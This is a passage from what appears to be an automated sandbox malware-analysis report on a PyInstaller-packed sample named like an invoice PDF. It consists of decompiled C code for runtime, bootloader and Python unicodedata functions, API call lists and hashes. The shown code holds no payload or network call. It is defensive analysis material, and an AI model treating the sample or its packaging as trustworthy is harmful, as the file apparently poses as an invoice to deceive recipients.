                            																									_t150 =  &(_t150[1]);
                            																									_t260 = _t260 + 1;
                            																									__eflags =  *_t150;
                            																								} while ( *_t150 != 0);
                            																							}
                            																							_t93 = _t260 + 1; // 0x2
                            																							_t306 = E01320B10(_t260, _t93, 4);
                            																							_t262 = _t305;
                            																							__eflags = _t306;
                            																							if(_t306 == 0) {
                            																								L102:
                            																								E01320ACD(_t221, _t285, _t291, _t306);
                            																								goto L103;
                            																							} else {
                            																								__eflags =  *_t291;
                            																								if( *_t291 == 0) {
                            																									L100:
                            																									E013209EB(0);
                            																									_t175 = _t306;
                            																									goto L101;
                            																								} else {
                            																									_push(_t221);
                            																									_t221 = _t306 - _t291;
                            																									__eflags = _t221;
                            																									do {
                            																										_t271 =  *_t291;
                            																										_t94 = _t271 + 1; // 0x5
                            																										_t285 = _t94;
                            																										do {
                            																											_t176 =  *_t271;
                            																											_t271 = _t271 + 1;
                            																											__eflags = _t176;
                            																										} while (_t176 != 0);
                            																										_t262 = _t271 - _t285;
                            																										_t95 = _t262 + 1; // 0x6
                            																										_v16 = _t95;
                            																										 *(_t221 + _t291) = E01320B10(_t262, _t95, 1);
                            																										E013209EB(0);
                            																										_t324 = _t324 + 0xc;
                            																										__eflags =  *(_t221 + _t291);
                            																										if( *(_t221 + _t291) == 0) {
                            																											goto L102;
                            																										} else {
                            																											_t180 = E01320A73( *(_t221 + _t291), _v16,  *_t291);
                            																											_t324 = _t324 + 0xc;
                            																											__eflags = _t180;
                            																											if(_t180 != 0) {
                            																												L103:
                            																												_push(0);
                            																												_push(0);
                            																												_push(0);
                            																												_push(0);
                            																												_push(0);
                            																												E01321798();
                            																												asm("int3");
                            																												_push(_t318);
                            																												_t319 = _t324;
                            																												_push(_t262);
                            																												_push(_t262);
                            																												_push(_t291);
                            																												_t292 = _v128;
                            																												__eflags = _t292;
                            																												if(_t292 != 0) {
                            																													_push(_t221);
                            																													_t223 = 0;
                            																													_t156 = _t292;
                            																													_t263 = 0;
                            																													_v20 = 0;
                            																													_push(_t306);
                            																													__eflags =  *_t292;
                            																													if( *_t292 != 0) {
                            																														do {
                            																															_t156 =  &(_t156[1]);
                            																															_t263 = _t263 + 1;
                            																															__eflags =  *_t156;
                            																														} while ( *_t156 != 0);
                            																													}
                            																													_t104 = _t263 + 1; // 0x2
                            																													_t307 = E01320B10(_t263, _t104, 4);
                            																													__eflags = _t307;
                            																													if(_t307 == 0) {
                            																														L119:
                            																														E01320ACD(_t223, _t285, _t292, _t307);
                            																														goto L120;
                            																													} else {
                            																														__eflags =  *_t292 - _t223;
                            																														if( *_t292 == _t223) {
                            																															L117:
                            																															E013209EB(_t223);
                            																															_t167 = _t307;
                            																															goto L118;
                            																														} else {
                            																															_t223 = _t307 - _t292;
                            																															__eflags = _t223;
                            																															do {
                            																																_t267 =  *_t292;
                            																																_t105 = _t267 + 2; // 0x6
                            																																_t285 = _t105;
                            																																do {
                            																																	_t168 =  *_t267;
                            																																	_t267 = _t267 + 2;
                            																																	__eflags = _t168 - _v20;
                            																																} while (_t168 != _v20);
                            																																_t107 = (_t267 - _t285 >> 1) + 1; // 0x3
                            																																_v24 = _t107;
                            																																 *(_t223 + _t292) = E01320B10(_t267 - _t285 >> 1, _t107, 2);
                            																																E013209EB(0);
                            																																_t324 = _t324 + 0xc;
                            																																__eflags =  *(_t223 + _t292);
                            																																if( *(_t223 + _t292) == 0) {
                            																																	goto L119;
                            																																} else {
                            																																	_t173 = E0132618C( *(_t223 + _t292), _v24,  *_t292);
                            																																	_t324 = _t324 + 0xc;
                            																																	__eflags = _t173;
                            																																	if(_t173 != 0) {
                            																																		L120:
                            																																		_push(0);
                            																																		_push(0);
                            																																		_push(0);
                            																																		_push(0);
                            																																		_push(0);
                            																																		E01321798();
                            																																		asm("int3");
                            																																		_push(_t319);
                            																																		_push(_t223);
                            																																		_push(_t307);
                            																																		_push(_t292);
                            																																		_t293 =  *0x13460bc; // 0xe55920
                            																																		_t308 = _t293;
                            																																		__eflags =  *_t293;
                            																																		if( *_t293 == 0) {
                            																																			L127:
                            																																			_t309 = _t308 - _t293;
                            																																			__eflags = _t309;
                            																																			_t311 =  ~(_t309 >> 2);
                            																																		} else {
                            																																			_t225 = _v8;
                            																																			do {
                            																																				_t163 = E0132C265(_v12,  *_t308, _t225);
                            																																				_t324 = _t324 + 0xc;
                            																																				__eflags = _t163;
                            																																				if(_t163 != 0) {
                            																																					goto L126;
                            																																				} else {
                            																																					_t165 =  *((intOrPtr*)(_t225 +  *_t308));
                            																																					__eflags = _t165 - 0x3d;
                            																																					if(_t165 == 0x3d) {
                            																																						L129:
                            																																						_t311 = _t308 - _t293 >> 2;
                            																																					} else {
                            																																						__eflags = _t165;
                            																																						if(_t165 == 0) {
                            																																							goto L129;
                            																																						} else {
                            																																							goto L126;
                            																																						}
                            																																					}
                            																																				}
                            																																				goto L128;
                            																																				L126:
                            																																				_t308 =  &(_t308[1]);
                            																																				__eflags =  *_t308;
                            																																			} while ( *_t308 != 0);
                            																																			goto L127;
                            																																		}
                            																																		L128:
                            																																		return _t311;
                            																																	} else {
                            																																		goto L115;
                            																																	}
                            																																}
                            																																goto L130;
                            																																L115:
                            																																_t292 = _t292 + 4;
                            																																__eflags =  *_t292 - _t173;
                            																															} while ( *_t292 != _t173);
                            																															_t223 = 0;
                            																															__eflags = 0;
                            																															goto L117;
                            																														}
                            																													}
                            																												} else {
                            																													_t167 = 0;
                            																													L118:
                            																													return _t167;
                            																												}
                            																											} else {
                            																												goto L98;
                            																											}
                            																										}
                            																										goto L130;
                            																										L98:
                            																										_t291 = _t291 + 4;
                            																										__eflags =  *_t291 - _t180;
                            																									} while ( *_t291 != _t180);
                            																									goto L100;
                            																								}
                            																							}
                            																						} else {
                            																							_t175 = 0;
                            																							L101:
                            																							return _t175;
                            																						}
                            																					} else {
                            																						_t274 =  &(_t305[_v20 + 1]);
                            																						 *(_t274 - 2) = _t148;
                            																						asm("sbb eax, eax");
                            																						_t185 = SetEnvironmentVariableW(_t305,  !( ~(_v9 & 0x000000ff)) & _t274);
                            																						__eflags = _t185;
                            																						if(_t185 == 0) {
                            																							_t186 = E0131C9CE();
                            																							_t221 = _t221 | 0xffffffff;
                            																							__eflags = _t221;
                            																							 *_t186 = 0x2a;
                            																						}
                            																						goto L85;
                            																					}
                            																				}
                            																			}
                            																		}
                            																	}
                            																} else {
                            																	_t191 =  *0x13460bc; // 0xe55920
                            																	__eflags = _a4 - _t221;
                            																	if(_a4 == _t221) {
                            																		L58:
                            																		__eflags = _t246;
                            																		if(_t246 != 0) {
                            																			goto L56;
                            																		} else {
                            																			__eflags = _t191;
                            																			if(_t191 != 0) {
                            																				L62:
                            																				 *0x13460c0 = E01320B10(_t246, 1, 4);
                            																				E013209EB(_t221);
                            																				_t323 = _t323 + 0xc;
                            																				goto L63;
                            																			} else {
                            																				 *0x13460bc = E01320B10(_t246, 1, 4);
                            																				E013209EB(_t221);
                            																				_t323 = _t323 + 0xc;
                            																				__eflags =  *0x13460bc - _t221; // 0xe55920
                            																				if(__eflags == 0) {
                            																					goto L55;
                            																				} else {
                            																					_t303 =  *0x13460c0; // 0xe44410
                            																					__eflags = _t303;
                            																					if(_t303 != 0) {
                            																						goto L64;
                            																					} else {
                            																						goto L62;
                            																					}
                            																				}
                            																			}
                            																		}
                            																	} else {
                            																		__eflags = _t191;
                            																		if(_t191 == 0) {
                            																			goto L58;
                            																		} else {
                            																			_t196 = L0131FF04(_t221);
                            																			__eflags = _t196;
                            																			if(_t196 != 0) {
                            																				L63:
                            																				_t303 =  *0x13460c0; // 0xe44410
                            																				__eflags = _t303;
                            																				if(_t303 == 0) {
                            																					L55:
                            																					_t221 = _t220 | 0xffffffff;
                            																					__eflags = _t221;
                            																					L56:
                            																					E013209EB(_t289);
                            																					_t136 = _t221;
                            																					goto L57;
                            																				} else {
                            																					goto L64;
                            																				}
                            																			} else {
                            																				goto L54;
                            																			}
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            													} else {
                            														_t197 = E0131C9CE();
                            														 *_t197 = 0x16;
                            														_t136 = _t197 | 0xffffffff;
                            														L57:
                            														return _t136;
                            													}
                            												} else {
                            													_t280 = _v16 + 1 + _t301 - _a4;
                            													asm("sbb eax, eax");
                            													 *(_t280 - 1) = _t218;
                            													_t204 = SetEnvironmentVariableA(_t301,  !( ~(_v5 & 0x000000ff)) & _t280);
                            													__eflags = _t204;
                            													if(_t204 == 0) {
                            														_t205 = E0131C9CE();
                            														_t218 = _t218 | 0xffffffff;
                            														__eflags = _t218;
                            														 *_t205 = 0x2a;
                            													}
                            													goto L42;
                            												}
                            											}
                            										}
                            									}
                            								}
                            							} else {
                            								__eflags = _a8;
                            								if(_a8 == 0) {
                            									L14:
                            									__eflags = _t120;
                            									if(_t120 == 0) {
                            										 *0x13460bc = E01320B10(_t231, 1, 4);
                            										E013209EB(_t218);
                            										_t299 =  *0x13460bc; // 0xe55920
                            										_t321 = _t321 + 0xc;
                            										__eflags = _t299;
                            										if(_t299 == 0) {
                            											goto L11;
                            										} else {
                            											__eflags =  *0x13460c0 - _t218; // 0xe44410
                            											if(__eflags != 0) {
                            												goto L20;
                            											} else {
                            												 *0x13460c0 = E01320B10(_t231, 1, 4);
                            												E013209EB(_t218);
                            												_t321 = _t321 + 0xc;
                            												__eflags =  *0x13460c0 - _t218; // 0xe44410
                            												if(__eflags == 0) {
                            													goto L11;
                            												} else {
                            													goto L19;
                            												}
                            											}
                            										}
                            									} else {
                            										_t218 = 0;
                            										goto L12;
                            									}
                            								} else {
                            									__eflags =  *0x13460c0 - _t218; // 0xe44410
                            									if(__eflags == 0) {
                            										goto L14;
                            									} else {
                            										_t214 = L0131FEFF(0, _t283);
                            										__eflags = _t214;
                            										if(_t214 != 0) {
                            											L19:
                            											_t299 =  *0x13460bc; // 0xe55920
                            											L20:
                            											__eflags = _t299;
                            											if(_t299 == 0) {
                            												L11:
                            												_t218 = _t217 | 0xffffffff;
                            												__eflags = _t218;
                            												L12:
                            												E013209EB(_t287);
                            												_t119 = _t218;
                            												goto L13;
                            											} else {
                            												goto L21;
                            											}
                            										} else {
                            											goto L10;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					_t215 = E0131C9CE();
                            					 *_t215 = 0x16;
                            					_t119 = _t215 | 0xffffffff;
                            					L13:
                            					return _t119;
                            				}
                            				L130:
                            			}
                            0x013264d5
                            0x013264df
                            0x013264e4
                            0x013264e9
                            0x013264ec
                            0x013264f2
                            0x00000000
                            0x013264f4
                            0x013264f4
                            0x013264fa
                            0x013264fc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013264fc
                            0x013264f2
                            0x013264d3
                            0x013264a2
                            0x013264a2
                            0x013264a4
                            0x00000000
                            0x013264a6
                            0x013264a6
                            0x013264ab
                            0x013264ad
                            0x01326515
                            0x01326515
                            0x0132651b
                            0x0132651d
                            0x013264ba
                            0x013264ba
                            0x013264ba
                            0x013264bd
                            0x013264be
                            0x013264c5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013264ad
                            0x013264a4
                            0x013264a0
                            0x01326492
                            0x01326462
                            0x0132643b
                            0x0132643b
                            0x01326440
                            0x01326446
                            0x013264c8
                            0x013264cc
                            0x013264cc
                            0x013263e0
                            0x013263e9
                            0x013263f1
                            0x013263f5
                            0x013263fc
                            0x01326402
                            0x01326404
                            0x01326406
                            0x0132640b
                            0x0132640b
                            0x0132640e
                            0x0132640e
                            0x00000000
                            0x01326404
                            0x013263de
                            0x013263cb
                            0x013263a3
                            0x01326304
                            0x0132625d
                            0x0132625d
                            0x01326260
                            0x01326291
                            0x01326291
                            0x01326293
                            0x013262a3
                            0x013262a8
                            0x013262ad
                            0x013262b3
                            0x013262b6
                            0x013262b8
                            0x00000000
                            0x013262ba
                            0x013262ba
                            0x013262c0
                            0x00000000
                            0x013262c2
                            0x013262cc
                            0x013262d1
                            0x013262d6
                            0x013262d9
                            0x013262df
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013262df
                            0x013262c0
                            0x01326295
                            0x01326295
                            0x00000000
                            0x01326295
                            0x01326262
                            0x01326262
                            0x01326268
                            0x00000000
                            0x0132626a
                            0x0132626a
                            0x0132626f
                            0x01326271
                            0x013262e1
                            0x013262e1
                            0x013262e7
                            0x013262e7
                            0x013262e9
                            0x0132627e
                            0x0132627e
                            0x0132627e
                            0x01326281
                            0x01326282
                            0x01326289
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01326271
                            0x01326268
                            0x01326260
                            0x01326257
                            0x01326227
                            0x01326200
                            0x01326200
                            0x01326205
                            0x0132620b
                            0x0132628c
                            0x01326290
                            0x01326290
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                            • String ID: Y
                            • API String ID: 2719235668-3319100138
                            • Opcode ID: b2d673df09d4a30c581aee2df11971096877d162b04b54a53b9d17d6d6efd602
                            • Instruction ID: 490073615fa8a6f556e13334bee73e99cd3a17d22bebe3cbb8ec7adc5f05c855
                            • Opcode Fuzzy Hash: b2d673df09d4a30c581aee2df11971096877d162b04b54a53b9d17d6d6efd602
                            • Instruction Fuzzy Hash: CCD12AF1A04325ABDB35BF6C9843A6E7BF9AF0271CF04416DEE46A7285DB3199048790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_CheckPositional.PYTHON38(is_normalized,?,00000002,00000002), ref: 6E2F1E7A
                            • _PyArg_BadArgument.PYTHON38(is_normalized,argument 1,str), ref: 6E2F1EAD
                            • _PyArg_BadArgument.PYTHON38(is_normalized,argument 2,str,?), ref: 6E2F1F02
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1F31
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A28), ref: 6E2F1F6A
                            • PyUnicode_Compare.PYTHON38(?,00000000), ref: 6E2F1FB4
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6E2F1FC5
                            • _PyUnicode_EqualToASCIIId.PYTHON38(00000080,6E3F8A34), ref: 6E2F1FDA
                            • _PyUnicode_EqualToASCIIId.PYTHON38(00000080,6E3F837C), ref: 6E2F1FF4
                            • _PyUnicode_EqualToASCIIId.PYTHON38(00000080,6E3F8370), ref: 6E2F2009
                            • PyErr_SetString.PYTHON38(6E79ED94,invalid normalization form), ref: 6E2F2028
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Equal$Arg_$Argument$CheckCompareDeallocErr_PositionalReadyString
                            • String ID: argument 1$argument 2$invalid normalization form$is_normalized$str
                            • API String ID: 3281200949-34262883
                            • Opcode ID: 956e401ec9323314cc38cf991fd10420427ebc74bdaa1558d23b66bd7abfb473
                            • Instruction ID: 4a9e21aa3eb3d57305a5037da9ea00aceda9d79fd8e311c65b76c013b53dcf98
                            • Opcode Fuzzy Hash: 956e401ec9323314cc38cf991fd10420427ebc74bdaa1558d23b66bd7abfb473
                            • Instruction Fuzzy Hash: 955127726A021AEBCB104B989C84A4AF766FF02376F104229FC19D7382D766D857C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • Py_SetProgramName.PYTHON38(01342A40,00000000,?,?,00000000,00000000,?,?,?,00000000), ref: 01313877
                            Strings
                            • Failed to convert progname to wchar_t, xrefs: 0131385F
                            • Error detected starting Python VM., xrefs: 01313962
                            • Failed to convert pyhome to wchar_t, xrefs: 0131389A
                            • C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip;C:\Users\user\AppData\Local\Temp\_MEI24122, xrefs: 013138C8, 013138FA
                            • sys.path (based on %s) exceeds buffer[%d] space, xrefs: 013138E2
                            • %s%cbase_library.zip%c%s, xrefs: 013138BE
                            • Failed to convert pypath to wchar_t, xrefs: 01313910
                            • C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip;C:\Users\user\AppData\Local\Temp\_MEI24122, xrefs: 013138FF, 01313929, 01313940
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiNameProgramWide
                            • String ID: %s%cbase_library.zip%c%s$C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip;C:\Users\user\AppData\Local\Temp\_MEI24122$C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip;C:\Users\user\AppData\Local\Temp\_MEI24122$Error detected starting Python VM.$Failed to convert progname to wchar_t$Failed to convert pyhome to wchar_t$Failed to convert pypath to wchar_t$sys.path (based on %s) exceeds buffer[%d] space
                            • API String ID: 1505701705-120043946
                            • Opcode ID: b1718e7f933b0ceceedfb84efd3f2dd8cb71766ba69bd0aa624d1a9c497d2384
                            • Instruction ID: 7256bb6b9cd75f6c55cf886e946c47a398a6a138b29d2a95150f093b66bf6f5c
                            • Opcode Fuzzy Hash: b1718e7f933b0ceceedfb84efd3f2dd8cb71766ba69bd0aa624d1a9c497d2384
                            • Instruction Fuzzy Hash: 6221DB77B5030166F56432BE7C0AFCA36496BD4B7DF041925FA65F02CEFAD0818582A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 22%
                            			E01314740(void* __edx, char* _a4) {
                            				short* _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				int _t18;
                            				short* _t23;
                            				void* _t24;
                            				void* _t25;
                            				char* _t26;
                            				struct HINSTANCE__* _t27;
                            				int _t28;
                            				intOrPtr* _t30;
                            				intOrPtr* _t32;
                            
                            				_t25 = __edx;
                            				_t33 =  &_v32;
                            				_t26 = _a4;
                            				_t28 = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, 0, 0);
                            				_t36 = _t28;
                            				if(_t28 != 0) {
                            					_t2 = _t28 + 1; // 0x1
                            					_push(2);
                            					_t23 = E013197F8(_t24);
                            					_t33 =  &_v32 + 8;
                            					__eflags = _t23;
                            					if(__eflags != 0) {
                            						__eflags = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, _t23, _t28);
                            						if(__eflags == 0) {
                            							_push("Failed to decode wchar_t from UTF-8\n");
                            							goto L6;
                            						}
                            					} else {
                            						_push("Out of memory.");
                            						_push("win32_utils_from_utf8");
                            						goto L7;
                            					}
                            				} else {
                            					_push("Failed to get wchar_t buffer size.\n");
                            					L6:
                            					_push("MultiByteToWideChar");
                            					L7:
                            					E01311860(_t25, _t36);
                            					_t33 = _t33 + 8;
                            					_t23 = 0;
                            				}
                            				_t27 = LoadLibraryA("kernel32");
                            				_t32 = GetProcAddress(_t27, "CreateActCtxW");
                            				_t30 = GetProcAddress(_t27, "ActivateActCtx");
                            				if(_t32 == 0 || _t30 == 0) {
                            					L14:
                            					__eflags = 0;
                            					return 0;
                            				} else {
                            					asm("xorps xmm0, xmm0");
                            					asm("movups [esp+0x10], xmm0");
                            					asm("movups [esp+0x24], xmm0");
                            					_v32 = 0x20;
                            					_v24 = _t23;
                            					_v28 = 0x10;
                            					 *0x133c000 =  *_t32( &_v32);
                            					L01319803(_t23);
                            					_t18 =  *0x133c000; // 0xffffffff
                            					if(_t18 == 0xffffffff) {
                            						L13:
                            						_push(0);
                            						 *0x133c000 = 0xffffffff;
                            						E01314860(_t25);
                            						goto L14;
                            					} else {
                            						_push(0x1344a50);
                            						_push(_t18);
                            						if( *_t30() == 0) {
                            							goto L13;
                            						} else {
                            							return 1;
                            						}
                            					}
                            				}
                            			}

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0131475F
                            • LoadLibraryA.KERNEL32(kernel32,?,?,?,?,?,?,?,?,013121A8,?,?,?,?,01312639,00000000), ref: 013147B9
                            • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 013147CD
                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 013147D7
                              • Part of subcall function 01314860: GetLastError.KERNEL32(013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 01314883
                              • Part of subcall function 01314860: FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 013148A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharErrorFormatLastLibraryLoadMessageMultiWide
                            • String ID: $ActivateActCtx$CreateActCtxW$Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$kernel32$win32_utils_from_utf8
                            • API String ID: 476984482-989751517
                            • Opcode ID: 54b65913799bdf2fc4b5987ce07bc3a9d15899c30ec00fa49752aa9e9844ca41
                            • Instruction ID: 0ff0e8c5fa000a24a614515a6a43087516136ef65ca9b01f86f8a5f0fab17f5f
                            • Opcode Fuzzy Hash: 54b65913799bdf2fc4b5987ce07bc3a9d15899c30ec00fa49752aa9e9844ca41
                            • Instruction Fuzzy Hash: 6F215C71A4431967E3346AAF6C41F57BA9C9B81B3CF14063AFD20A62C4E7A1D44483EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyModule_Create2.PYTHON38(6E3F81F8,000003F5), ref: 6E2F41C5
                            • PyModule_AddStringConstant.PYTHON38(00000000,unidata_version,12.1.0), ref: 6E2F41E2
                            • PyModule_AddObject.PYTHON38(00000000,UCD,6E3F8128), ref: 6E2F41FF
                            • _PyObject_New.PYTHON38(6E3F8128), ref: 6E2F4206
                            • PyModule_AddObject.PYTHON38(00000000,ucd_3_2_0,00000000), ref: 6E2F422F
                            • PyCapsule_New.PYTHON38(6E31E0A0,unicodedata.ucnhash_CAPI,00000000), ref: 6E2F4240
                            • PyModule_AddObject.PYTHON38(00000000,ucnhash_CAPI,00000000), ref: 6E2F4254
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Module_$Object$Capsule_ConstantCreate2Object_String
                            • String ID: 12.1.0$UCD$ucd_3_2_0$ucnhash_CAPI$unicodedata.ucnhash_CAPI$unidata_version$e/n
                            • API String ID: 3760240918-3421882380
                            • Opcode ID: 8f81d0a57dccfa1986319ddd28672dce421a4a3564597558d53c03f78ff1158f
                            • Instruction ID: 6854e3db42a70e1a0dd758bc2df0eb11312d045956cb419b486b128d61701c52
                            • Opcode Fuzzy Hash: 8f81d0a57dccfa1986319ddd28672dce421a4a3564597558d53c03f78ff1158f
                            • Instruction Fuzzy Hash: CA01D8705E051AEBCA002BD5AC88F4EB66BFF42362B154064F902AA306D6B18507CFF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 30%
                            			E6E2F2060(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t24;
                            				signed int _t27;
                            				signed int _t29;
                            				signed int _t30;
                            				signed int _t31;
                            				signed int _t32;
                            				signed int _t34;
                            				signed int _t36;
                            				void* _t42;
                            				void* _t44;
                            				intOrPtr _t47;
                            				intOrPtr _t55;
                            				signed int* _t56;
                            				intOrPtr* _t61;
                            				intOrPtr* _t67;
                            				intOrPtr* _t69;
                            				signed int _t81;
                            				signed int* _t82;
                            				void* _t87;
                            				void* _t103;
                            
                            				_t24 = _a12;
                            				_t81 = 0;
                            				_t103 = _t24 - 2;
                            				if(_t103 < 0 || _t103 > 0) {
                            					__imp___PyArg_CheckPositional("normalize", _t24, 2, 2);
                            					_t87 = _t87 + 0x10;
                            					if(_t24 == 0) {
                            						goto L29;
                            					} else {
                            						goto L3;
                            					}
                            				} else {
                            					L3:
                            					_t67 = _a8;
                            					_t55 =  *_t67;
                            					if(( *( *((intOrPtr*)(_t55 + 4)) + 0x54) & 0x10000000) != 0) {
                            						__eflags =  *(_t55 + 0x10) & 0x00000080;
                            						_t61 = __imp___PyUnicode_Ready;
                            						if(( *(_t55 + 0x10) & 0x00000080) != 0) {
                            							L8:
                            							_t56 =  *(_t67 + 4);
                            							_t47 =  *_t67;
                            							_t27 = _t56[1];
                            							__eflags =  *(_t27 + 0x54) & 0x10000000;
                            							if(( *(_t27 + 0x54) & 0x10000000) != 0) {
                            								__eflags = _t56[4] & 0x00000080;
                            								if((_t56[4] & 0x00000080) != 0) {
                            									L12:
                            									_t82 =  *(_t67 + 4);
                            									__eflags = _t82[2];
                            									if(_t82[2] == 0) {
                            										L24:
                            										 *_t82 =  *_t82 + 1;
                            										__eflags =  *_t82;
                            										return _t82;
                            									} else {
                            										_t69 = __imp___PyUnicode_EqualToASCIIId;
                            										_t29 =  *_t69(_t47, 0x6e3f8a28);
                            										__eflags = _t29;
                            										if(_t29 == 0) {
                            											_t30 =  *_t69(_t47, 0x6e3f8a34);
                            											__eflags = _t30;
                            											if(_t30 == 0) {
                            												_t31 =  *_t69(_t47, 0x6e3f837c);
                            												__eflags = _t31;
                            												if(_t31 == 0) {
                            													_t32 =  *_t69(_t47, 0x6e3f8370);
                            													__eflags = _t32;
                            													if(_t32 == 0) {
                            														__imp__PyErr_SetString( *__imp__PyExc_ValueError, "invalid normalization form");
                            														_t81 = 0;
                            														__eflags = 0;
                            														goto L27;
                            													} else {
                            														_t71 = _a4;
                            														_t34 = E6E2F3550(_a4, _t82, 0, 1, 1);
                            														__eflags = _t34;
                            														if(_t34 != 0) {
                            															return E6E2F2A70(_t47, _t71, _t82, _t71, _t82, 1);
                            														} else {
                            															goto L24;
                            														}
                            													}
                            												} else {
